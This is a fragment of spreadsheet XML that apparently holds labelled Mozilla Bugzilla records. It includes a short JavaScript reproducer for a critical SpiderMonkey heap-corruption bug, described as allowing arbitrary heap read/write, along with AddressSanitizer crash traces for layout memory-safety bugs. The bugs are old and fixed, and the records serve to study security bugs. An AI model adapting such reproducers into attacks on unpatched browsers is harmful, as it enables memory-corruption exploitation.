/thunderbird/releases/3.1.9/contrib/solaris_tarball/thunderbird-3.1.8-3.1.9.en-US.solaris-10-fcs-i386.partial.mar
/thunderbird/releases/3.1.9/contrib/solaris_tarball/thunderbird-3.1.8-3.1.9.en-US.opensolaris-sparc.partial.mar
/thunderbird/releases/3.1.9/contrib/solaris_tarball/thunderbird-3.1.8-3.1.9.en-US.opensolaris-i386.partial.mar
The complete MAR for 3.1.9:
/thunderbird/releases/3.1.9/contrib/solaris_tarball/thunderbird-3.1.9.en-US.solaris-10-fcs-sparc.complete.mar
/thunderbird/releases/3.1.9/contrib/solaris_tarball/thunderbird-3.1.9.en-US.solaris-10-fcs-i386.complete.mar
/thunderbird/releases/3.1.9/contrib/solaris_tarball/thunderbird-3.1.9.en-US.opensolaris-sparc.complete.mar
/thunderbird/releases/3.1.9/contrib/solaris_tarball/thunderbird-3.1.9.en-US.opensolaris-i386.complete.mar
Thanks!</t>
        </is>
      </c>
      <c r="X6414" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6415">
      <c r="A6415" t="n">
        <v>476049</v>
      </c>
      <c r="B6415" t="inlineStr">
        <is>
          <t>2009-01-29 15:09:36 -0800</t>
        </is>
      </c>
      <c r="C6415" t="inlineStr">
        <is>
          <t>JSOP_DEFVAR enables gvar optimization for non-permanent properties</t>
        </is>
      </c>
      <c r="D6415" t="inlineStr">
        <is>
          <t>2009-08-07 16:50:15 -0700</t>
        </is>
      </c>
      <c r="E6415" t="n">
        <v>1</v>
      </c>
      <c r="F6415" t="n">
        <v>1</v>
      </c>
      <c r="G6415" t="n">
        <v>3</v>
      </c>
      <c r="H6415" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6415" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6415" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K6415" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6415" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6415" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6415" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6415" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6415" t="inlineStr">
        <is>
          <t>[sg:critical] fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q6415" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6415" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6415" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6415" t="n">
        <v>1</v>
      </c>
      <c r="U6415" t="n">
        <v>0</v>
      </c>
      <c r="V6415" t="n">
        <v>38</v>
      </c>
      <c r="W6415" t="inlineStr">
        <is>
          <t>gvar optimization in the js_Interpret can only be applied to permanent properties as it assumes that properties's slot stays the same. But JSOP_DEFVAR fails to enforce this when it defines a variable that already exists. JSOP_DEFVAR will enable the optimization even if such existing property does not have the JSPROP_PERMANENT attribute and can be deleted. The following example demonstrates the problem:
@watson~/m/tm/js/src&gt; cat ~/s/y.js
for (var i = 0; i != 1000; ++i)
    this["a"+i] = 0;
eval("var x");
for (var i = 0; i != 1000; ++i)
    delete this["a"+i];
@watson~/m/tm/js/src&gt; cat ~/s/x.js
var x;
eval("delete x;");
x={};
@watson~/m/tm/js/src&gt; ~/build/js64.tm.dbg/js -f ~/s/y.js -f ~/s/x.js
Assertion failure: slot &lt; (obj)-&gt;map-&gt;freeslot, at /home/igor/m/tm/js/src/jsinterp.cpp:5623
Aborted
Note that the example uses 2 file to ensure that the eval that define variable in the first file will be executed before JSOP_DEFVAR for the second. In a browser this can be modeled with 2 &lt;script&gt; tags.
The bug is critical as it allows to read and write arbitrary data passed heap-allocated array.</t>
        </is>
      </c>
      <c r="X6415" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6416">
      <c r="A6416" t="n">
        <v>930381</v>
      </c>
      <c r="B6416" t="inlineStr">
        <is>
          <t>2013-10-23 22:16:42 -0700</t>
        </is>
      </c>
      <c r="C6416" t="inlineStr">
        <is>
          <t>heap-use-after-free in libxul.so!PresShell::DispatchSynthMouseMove</t>
        </is>
      </c>
      <c r="D6416" t="inlineStr">
        <is>
          <t>2024-05-30 08:08:26 -0700</t>
        </is>
      </c>
      <c r="E6416" t="n">
        <v>1</v>
      </c>
      <c r="F6416" t="n">
        <v>1</v>
      </c>
      <c r="G6416" t="n">
        <v>3</v>
      </c>
      <c r="H6416" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6416" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6416" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K6416" t="inlineStr">
        <is>
          <t>27 Branch</t>
        </is>
      </c>
      <c r="L6416" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6416" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6416" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6416" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6416" t="inlineStr">
        <is>
          <t>[adv-main26+][adv-esr24.2+][qa-]</t>
        </is>
      </c>
      <c r="Q6416" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6416" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6416" t="inlineStr">
        <is>
          <t>mozilla28</t>
        </is>
      </c>
      <c r="T6416" t="n">
        <v>1</v>
      </c>
      <c r="U6416" t="n">
        <v>0</v>
      </c>
      <c r="V6416" t="n">
        <v>33</v>
      </c>
      <c r="W6416" t="inlineStr">
        <is>
          <t>Created attachment 821472
3D8EA595-001412.html
Found by the BlackBerry Security Automated Analysis Team's fuzzing framework ALF.
==21242==ERROR: AddressSanitizer: heap-use-after-free on address 0x61700022a21c at pc 0x7f0fe52bd9bc bp 0x7fff20ff6650 sp 0x7fff20ff6648
READ of size 4 at 0x61700022a21c thread T0
    #0 0x7f0fe52bd9bb (libxul.so!PresShell::DispatchSynthMouseMove(mozilla::WidgetGUIEvent*, bool)+0x1db)
        Line 75 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/base/RestyleManager.h"
    #1 0x7f0fe52cc0c4 (libxul.so!PresShell::ProcessSynthMouseMoveEvent(bool)+0xde4)
        Line 5256 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/base/nsPresShell.cpp"
    #2 0x7f0fe52f0547 (libxul.so!nsRefreshDriver::Tick(long, mozilla::TimeStamp)+0xbb7)
        Line 1074 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/base/nsRefreshDriver.cpp"
    #3 0x7f0fe52f64e0 (libxul.so!mozilla::RefreshDriverTimer::Tick()+0x1f0)
        Line 168 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/base/nsRefreshDriver.cpp"
    #4 0x7f0fe8de4c31 (libxul.so!nsTimerImpl::Fire()+0x6d1)
        Line 546 of "/builds/slave/m-in-l64-asan-0000000000000000/build/xpcom/threads/nsTimerImpl.cpp"
    #5 0x7f0fe8de52d6 (libxul.so!nsTimerEvent::Run()+0x66)
        Line 630 of "/builds/slave/m-in-l64-asan-0000000000000000/build/xpcom/threads/nsTimerImpl.cpp"
    #6 0x7f0fe8ddc019 (libxul.so!nsThread::ProcessNextEvent(bool, bool*)+0xaa9)
        Line 622 of "/builds/slave/m-in-l64-asan-0000000000000000/build/xpcom/threads/nsThread.cpp"
    #7 0x7f0fe8d08371 (libxul.so!NS_ProcessNextEvent(nsIThread*, bool)+0xb1)
        Line 251 of "/builds/slave/m-in-l64-asan-0000000000000000/build/xpcom/glue/nsThreadUtils.cpp"
    #8 0x7f0fe7955091 (libxul.so!mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*)+0x311)
        Line 85 of "/builds/slave/m-in-l64-asan-0000000000000000/build/ipc/glue/MessagePump.cpp"
    #9 0x7f0fe8ef7653 (libxul.so!MessageLoop::Run()+0x1c3)
        Line 220 of "/builds/slave/m-in-l64-asan-0000000000000000/build/ipc/chromium/src/base/message_loop.cc"
    #10 0x7f0fe7733cac (libxul.so!nsBaseAppShell::Run()+0x5c)
        Line 161 of "/builds/slave/m-in-l64-asan-0000000000000000/build/widget/xpwidgets/nsBaseAppShell.cpp"
    #11 0x7f0fe7135d9e (libxul.so!nsAppStartup::Run()+0xbe)
        Line 268 of "/builds/slave/m-in-l64-asan-0000000000000000/build/toolkit/components/startup/nsAppStartup.cpp"
    #12 0x7f0fe46bf1c5 (libxul.so!XREMain::XRE_mainRun()+0x1e05)
        Line 3886 of "/builds/slave/m-in-l64-asan-0000000000000000/build/toolkit/xre/nsAppRunner.cpp"
    #13 0x7f0fe46c00fa (libxul.so!XREMain::XRE_main(int, char**, nsXREAppData const*)+0x4fa)
        Line 3954 of "/builds/slave/m-in-l64-asan-0000000000000000/build/toolkit/xre/nsAppRunner.cpp"
    #14 0x7f0fe46c102b (libxul.so!XRE_main+0x3ab)
        Line 4156 of "/builds/slave/m-in-l64-asan-0000000000000000/build/toolkit/xre/nsAppRunner.cpp"
    #15 0x459d1d (firefox!main+0x94d)
        Line 275 of "/builds/slave/m-in-l64-asan-0000000000000000/build/browser/app/nsBrowserApp.cpp"
    #16 0x7f0ff3d5876c (libc.so.6!__libc_start_main+0xec)
        Line 226 of "libc-start.c"
    #17 0x45929c (firefox!_start+0x28)
0x61700022a21c is located 28 bytes inside of 760-byte region [0x61700022a200,0x61700022a4f8)
freed by thread T0 here:
    #0 0x4461a5 (firefox!free+0x55)
        Line 64 of "/builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc"
    #1 0x7f0fe529f118 (libxul.so!mozilla::RestyleManager::Release()+0x138)
        Line 225 of "../../dist/include/mozilla/mozalloc.h"
previously allocated by thread T0 here:
    #0 0x4462e5 (firefox!malloc+0x55)
        Line 74 of "/builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc"
    #1 0x7f0feddfe5c8 (libmozalloc.so!moz_xmalloc+0x8)
        Line 54 of "/builds/slave/m-in-l64-asan-0000000000000000/build/memory/mozalloc/mozalloc.cpp"
    #2 0x7f0fe5230421 (libxul.so!nsDocumentViewer::InitInternal(nsIWidget*, nsISupports*, nsIntRect const&amp;, bool, bool, bool)+0x581)
        Line 824 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/base/nsDocumentViewer.cpp"
    #3 0x7f0fe522fe90 (libxul.so!nsDocumentViewer::Init(nsIWidget*, nsIntRect const&amp;)+0x20)
        Line 642 of "/builds/slave/m-in-l64-asan-0000000000000000/build/layout/base/nsDocumentViewer.cpp"
    #4 0x7f0fe929f537 (libxul.so!nsDocShell::Embed(nsIContentViewer*, char const*, nsISupports*)+0xe7)
        Line 6397 of "/builds/slave/m-in-l64-asan-0000000000000000/build/docshell/base/nsDocShell.cpp"
    #5 0x7f0fe92b14f4 (libxul.so!nsDocShell::CreateContentViewer(char const*, nsIRequest*, nsIStreamListener**)+0x1084)
        Line 8173 of "/builds/slave/m-in-l64-asan-0000000000000000/build/docshell/base/nsDocShell.cpp"
    #6 0x7f0fe9254ad4 (libxul.so!nsDSURIContentListener::DoContent(char const*, bool, nsIRequest*, nsIStreamListener**, bool*)+0x304)
        Line 122 of "/builds/slave/m-in-l64-asan-0000000000000000/build/docshell/base/nsDSURIContentListener.cpp"
    #7 0x7f0fe92f698f (libxul.so!nsDocumentOpenInfo::TryContentListener(nsIURIContentListener*, nsIChannel*)+0x6ef)
        Line 680 of "/builds/slave/m-in-l64-asan-0000000000000000/build/uriloader/base/nsURILoader.cpp"
    #8 0x7f0fe92f433c (libxul.so!nsDocumentOpenInfo::DispatchContent(nsIRequest*, nsISupports*)+0x67c)
        Line 382 of "/builds/slave/m-in-l64-asan-0000000000000000/build/uriloader/base/nsURILoader.cpp"
    #9 0x7f0fe92f3aaf (libxul.so!nsDocumentOpenInfo::OnStartRequest(nsIRequest*, nsISupports*)+0x32f)
        Line 258 of "/builds/slave/m-in-l64-asan-0000000000000000/build/uriloader/base/nsURILoader.cpp"
    #10 0x7f0fe4964bc2 (libxul.so!nsBaseChannel::OnStartRequest(nsIRequest*, nsISupports*)+0x1e2)
        Line 718 of "/builds/slave/m-in-l64-asan-0000000000000000/build/netwerk/base/src/nsBaseChannel.cpp"
Shadow bytes around the buggy address:
  0x0c2e8003d3f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2e8003d400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2e8003d410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2e8003d420: 00 fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2e8003d430: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0c2e8003d440: fd fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e8003d450: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e8003d460: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e8003d470: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e8003d480: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2e8003d490: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd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ASan internal:         fe
==21242==ABORTING</t>
        </is>
      </c>
      <c r="X6416" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6417">
      <c r="A6417" t="n">
        <v>858106</v>
      </c>
      <c r="B6417" t="inlineStr">
        <is>
          <t>2013-04-04 09:06:24 -0700</t>
        </is>
      </c>
      <c r="C6417" t="inlineStr">
        <is>
          <t>"Approve theme" button shows/hides the "Load More" button</t>
        </is>
      </c>
      <c r="D6417" t="inlineStr">
        <is>
          <t>2013-04-08 16:45:47 -0700</t>
        </is>
      </c>
      <c r="E6417" t="n">
        <v>1</v>
      </c>
      <c r="F6417" t="n">
        <v>1</v>
      </c>
      <c r="G6417" t="n">
        <v>6</v>
      </c>
      <c r="H6417" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6417" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J6417" t="inlineStr">
        <is>
          <t>Reviewer Tools</t>
        </is>
      </c>
      <c r="K6417" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L6417" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6417" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N6417" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6417" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6417" t="inlineStr"/>
      <c r="Q6417" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6417" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6417" t="inlineStr">
        <is>
          <t>2013-04-04</t>
        </is>
      </c>
      <c r="T6417" t="n">
        <v>1</v>
      </c>
      <c r="U6417" t="n">
        <v>0</v>
      </c>
      <c r="V6417" t="n">
        <v>5</v>
      </c>
      <c r="W6417" t="inlineStr">
        <is>
          <t>Steps to reproduce:
1. Load Theme Review Queue landing page https://marketplace-dev.allizom.org/reviewers/themes/queue/
2. Approve all the listed themes but don't press the Commit Reviews buttons.
3. Press the Approve Theme button again from the last listed theme.
Expected results:
The review for that theme is cleared.
Actual results:
The "Load More" button is hidden. It's displayed again when the Approve Theme button is pressed. Issue is reproducing for all the review buttons.
Notes/Issues:
Verified on FF23 (Win 7).
Screencast for this issue http://screencast.com/t/3XAB572jt6PF</t>
        </is>
      </c>
      <c r="X6417" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6418">
      <c r="A6418" t="n">
        <v>989994</v>
      </c>
      <c r="B6418" t="inlineStr">
        <is>
          <t>2014-03-31 06:23:32 -0700</t>
        </is>
      </c>
      <c r="C6418" t="inlineStr">
        <is>
          <t>out of bounds read in PropertyProvider::FindJustificationRange</t>
        </is>
      </c>
      <c r="D6418" t="inlineStr">
        <is>
          <t>2018-07-02 02:57:21 -0700</t>
        </is>
      </c>
      <c r="E6418" t="n">
        <v>1</v>
      </c>
      <c r="F6418" t="n">
        <v>1</v>
      </c>
      <c r="G6418" t="n">
        <v>3</v>
      </c>
      <c r="H6418" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6418" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6418" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K6418" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6418" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6418" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6418" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6418" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6418" t="inlineStr">
        <is>
          <t>[asan][adv-main30+]</t>
        </is>
      </c>
      <c r="Q6418" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6418" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6418" t="inlineStr">
        <is>
          <t>mozilla31</t>
        </is>
      </c>
      <c r="T6418" t="n">
        <v>1</v>
      </c>
      <c r="U6418" t="n">
        <v>0</v>
      </c>
      <c r="V6418" t="n">
        <v>34</v>
      </c>
      <c r="W6418" t="inlineStr">
        <is>
          <t>Created attachment 8399399
Testcase
&gt;==2982==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c0002ef74c at pc 0x7f2ce0d18cdf bp 0x7fff28700280 sp 0x7fff28700278
&gt;READ of size 4 at 0x60c0002ef74c thread T0
&gt;    #0 0x7f2ce0d18cde in PropertyProvider::FindJustificationRange(gfxSkipCharsIterator*, gfxSkipCharsIterator*) objdir-ff-asan/layout/generic/../../dist/include/gfxFont.h:2167
&gt;    #1 0x7f2ce0d47a23 in nsTextFrame::TrimTrailingWhiteSpace(nsRenderingContext*) layout/generic/nsTextFrame.cpp:8204
&gt;    #2 0x7f2ce0b43aeb in nsLineLayout::TrimTrailingWhiteSpaceIn(nsLineLayout::PerSpanData*, int*) layout/generic/nsLineLayout.cpp:2344
&gt;    #3 0x7f2ce0b43a82 in nsLineLayout::TrimTrailingWhiteSpaceIn(nsLineLayout::PerSpanData*, int*) layout/generic/nsLineLayout.cpp:2291
&gt;    #4 0x7f2ce0b43a82 in nsLineLayout::TrimTrailingWhiteSpaceIn(nsLineLayout::PerSpanData*, int*) layout/generic/nsLineLayout.cpp:2291
&gt;    #5 0x7f2ce0b448bc in nsLineLayout::TrimTrailingWhiteSpace() layout/generic/nsLineLayout.cpp:2412
&gt;    #6 0x7f2ce0b92d47 in nsBlockFrame::PlaceLine(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFloatManager::SavedState*, nsRect&amp;, int&amp;, bool*) layout/generic/nsBlockFrame.cpp:4042
&gt;    #7 0x7f2ce0b917ec in nsBlockFrame::DoReflowInlineFrames(nsBlockReflowState&amp;, nsLineLayout&amp;, nsLineList_iterator, nsFlowAreaRect&amp;, int&amp;, nsFloatManager::SavedState*, bool*, LineReflowStatus*, bool) layout/generic/nsBlockFrame.cpp:3646
&gt;    #8 0x7f2ce0b8a720 in nsBlockFrame::ReflowInlineFrames(nsBlockReflowState&amp;, nsLineList_iterator, bool*) layout/generic/nsBlockFrame.cpp:3374
&gt;    #9 0x7f2ce0b7d2b8 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) layout/generic/nsBlockFrame.cpp:2528
&gt;    #10 0x7f2ce0b75e2f in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsBlockFrame.cpp:1072
&gt;    #11 0x7f2ce0b8eee1 in nsBlockReflowContext::ReflowBlock(nsRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) layout/generic/nsBlockReflowContext.cpp:260
&gt;    #12 0x7f2ce0b87876 in nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, bool*) layout/generic/nsBlockFrame.cpp:3099
&gt;    #13 0x7f2ce0b7d2d5 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) layout/generic/nsBlockFrame.cpp:2525
&gt;    #14 0x7f2ce0b75e2f in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsBlockFrame.cpp:1072
&gt;    #15 0x7f2ce0b8eee1 in nsBlockReflowContext::ReflowBlock(nsRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) layout/generic/nsBlockReflowContext.cpp:260
&gt;    #16 0x7f2ce0b87876 in nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, bool*) layout/generic/nsBlockFrame.cpp:3099
&gt;    #17 0x7f2ce0b7d2d5 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) layout/generic/nsBlockFrame.cpp:2525
&gt;    #18 0x7f2ce0b75e2f in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsBlockFrame.cpp:1072
&gt;    #19 0x7f2ce0b8eee1 in nsBlockReflowContext::ReflowBlock(nsRect const&amp;, bool, nsCollapsingMargin&amp;, int, bool, nsLineBox*, nsHTMLReflowState&amp;, unsigned int&amp;, nsBlockReflowState&amp;) layout/generic/nsBlockReflowContext.cpp:260
&gt;    #20 0x7f2ce0b87876 in nsBlockFrame::ReflowBlockFrame(nsBlockReflowState&amp;, nsLineList_iterator, bool*) layout/generic/nsBlockFrame.cpp:3099
&gt;    #21 0x7f2ce0b7d2d5 in nsBlockFrame::ReflowDirtyLines(nsBlockReflowState&amp;) layout/generic/nsBlockFrame.cpp:2525
&gt;    #22 0x7f2ce0b75e2f in nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsBlockFrame.cpp:1072
&gt;    #23 0x7f2ce0bbc680 in nsCanvasFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsContainerFrame.cpp:957
&gt;    #24 0x7f2ce0bbd5ce in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) layout/generic/nsContainerFrame.cpp:957
&gt;    #25 0x7f2ce0c485ec in nsHTMLScrollFrame::ReflowScrolledFrame(ScrollReflowState*, bool, bool, nsHTMLReflowMetrics*, bool) layout/generic/nsGfxScrollFrame.cpp:459
&gt;    #26 0x7f2ce0c4a527 in nsHTMLScrollFrame::ReflowContents(ScrollReflowState*, nsHTMLReflowMetrics const&amp;) layout/generic/nsGfxScrollFrame.cpp:570
&gt;    #27 0x7f2ce0c4c9c9 in nsHTMLScrollFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsGfxScrollFrame.cpp:809
&gt;    #28 0x7f2ce0bbd5ce in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, int, int, unsigned int, unsigned int&amp;, nsOverflowContinuationTracker*) layout/generic/nsContainerFrame.cpp:957
&gt;    #29 0x7f2ce0d5a170 in ViewportFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) layout/generic/nsViewportFrame.cpp:221
&gt;    #30 0x7f2ce09288c1 in PresShell::DoReflow(nsIFrame*, bool) layout/base/nsPresShell.cpp:8272
&gt;    #31 0x7f2ce093c329 in PresShell::ProcessReflowCommands(bool) layout/base/nsPresShell.cpp:8428
&gt;    #32 0x7f2ce093ba77 in PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) layout/base/nsPresShell.cpp:4082
&gt;    #33 0x7f2cdf35c9f9 in nsEventStateManager::PreHandleEvent(nsPresContext*, mozilla::WidgetEvent*, nsIFrame*, nsEventStatus*) dom/events/nsEventStateManager.cpp:5265
&gt;    #34 0x7f2ce095a64e in PresShell::HandleEventInternal(mozilla::WidgetEvent*, nsEventStatus*) layout/base/nsPresShell.cpp:7214
&gt;    #35 0x7f2ce09591aa in PresShell::HandlePositionedEvent(nsIFrame*, mozilla::WidgetGUIEvent*, nsEventStatus*) layout/base/nsPresShell.cpp:6981
&gt;    #36 0x7f2ce09581d1 in PresShell::HandleEvent(nsIFrame*, mozilla::WidgetGUIEvent*, bool, nsEventStatus*) layout/base/nsPresShell.cpp:6781
&gt;    #37 0x7f2cdf924291 in nsViewManager::DispatchEvent(mozilla::WidgetGUIEvent*, nsView*, nsEventStatus*) view/src/nsViewManager.cpp:783
&gt;    #38 0x7f2ce0939b32 in PresShell::DispatchSynthMouseMove(mozilla::WidgetGUIEvent*, bool) layout/base/nsPresShell.cpp:3628
&gt;    #39 0x7f2ce09494c7 in PresShell::ProcessSynthMouseMoveEvent(bool) layout/base/nsPresShell.cpp:5487
&gt;    #40 0x7f2ce0968b3f in PresShell::nsSynthMouseMoveEvent::WillRefresh(mozilla::TimeStamp) layout/base/nsPresShell.h:616
&gt;    #41 0x7f2ce096ee59 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) layout/base/nsRefreshDriver.cpp:1077
&gt;    #42 0x7f2ce0974ef4 in mozilla::RefreshDriverTimer::Tick() layout/base/nsRefreshDriver.cpp:168
&gt;    #43 0x7f2cdc38b814 in nsTimerImpl::Fire() xpcom/threads/nsTimerImpl.cpp:551
&gt;    #44 0x7f2cdc38be9e in nsTimerEvent::Run() xpcom/threads/nsTimerImpl.cpp:635
&gt;    #45 0x7f2cdc382f20 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:694
&gt;    #46 0x7f2cdc24b4da in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:263
&gt;    #47 0x7f2cdcb40059 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:95
&gt;    #48 0x7f2cdcae93a0 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:226
&gt;    #49 0x7f2cded80277 in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:164
&gt;    #50 0x7f2ce1b93b38 in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:276
&gt;    #51 0x7f2ce1a03483 in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:4019
&gt;    #52 0x7f2ce1a0436d in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:4088
&gt;    #53 0x7f2ce1a051bd in XRE_main toolkit/xre/nsAppRunner.cpp:4300
&gt;    #54 0x48c6e7 in main browser/app/nsBrowserApp.cpp:282
&gt;    #55 0x7f2ceaa85de4 in __libc_start_main /build/buildd/eglibc-2.17/csu/libc-start.c:260
&gt;0x60c0002ef74c is located 16 bytes to the right of 124-byte region [0x60c0002ef6c0,0x60c0002ef73c)
&gt;allocated by thread T0 here:
&gt;    #0 0x473d81 in malloc _asan_rtl_
&gt;    #1 0x7f2cdd7bf1e4 in gfxFontGroup::MakeTextRun(char16_t const*, unsigned int, gfxTextRunFactory::Parameters const*, unsigned int) gfx/thebes/gfxFont.cpp:5958
&gt;    #2 0x7f2ce0d0a862 in BuildTextRunsScanner::BuildTextRunForFrames(void*) layout/generic/nsTextFrame.cpp:569
&gt;    #3 0x7f2ce0d054b8 in BuildTextRunsScanner::FlushFrames(bool, bool) layout/generic/nsTextFrame.cpp:1488
&gt;    #4 0x7f2ce0d0db5d in BuildTextRunsScanner::ScanFrame(nsIFrame*) layout/generic/nsTextFrame.cpp:1679
&gt;    #5 0x7f2ce0d0de73 in BuildTextRunsScanner::ScanFrame(nsIFrame*) layout/generic/nsTextFrame.cpp:1719
&gt;    #6 0x7f2ce0d0de73 in BuildTextRunsScanner::ScanFrame(nsIFrame*) layout/generic/nsTextFrame.cpp:1719
&gt;    #7 0x7f2ce0d12a95 in nsTextFrame::EnsureTextRun(nsTextFrame::TextRunType, gfxContext*, nsIFrame*, nsLineList_iterator const*, unsigned int*) layout/generic/nsTextFrame.cpp:1392
&gt;    #8 0x7f2ce0d426d9 in nsTextFrame::ReflowText(nsLineLayout&amp;, int, nsRenderingContext*, nsHTMLReflowMetrics&amp;, unsigned int&amp;) layout/generic/nsTextFrame.cpp:7800
